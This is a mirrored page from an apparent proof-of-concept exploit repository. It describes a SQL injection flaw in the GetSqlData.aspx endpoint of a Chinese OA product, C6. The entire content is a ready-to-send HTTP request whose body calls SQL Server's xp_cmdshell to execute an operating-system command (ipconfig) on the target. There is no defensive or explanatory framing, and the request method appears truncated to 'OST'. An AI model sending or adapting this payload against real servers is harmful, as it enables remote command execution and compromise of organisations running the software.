mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
14 lines
346 B
Markdown
14 lines
346 B
Markdown
## 某和OA C6-GetSqlData.aspx SQL注入漏洞
|
|
```
|
|
OST /C6/Control/GetSqlData.aspx/.ashx
|
|
Host: ip:port
|
|
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
|
|
Connection: close
|
|
Content-Length: 189
|
|
Content-Type: text/plain
|
|
Accept-Encoding: gzip
|
|
|
|
exec master..xp_cmdshell 'ipconfig'
|
|
|
|
```
|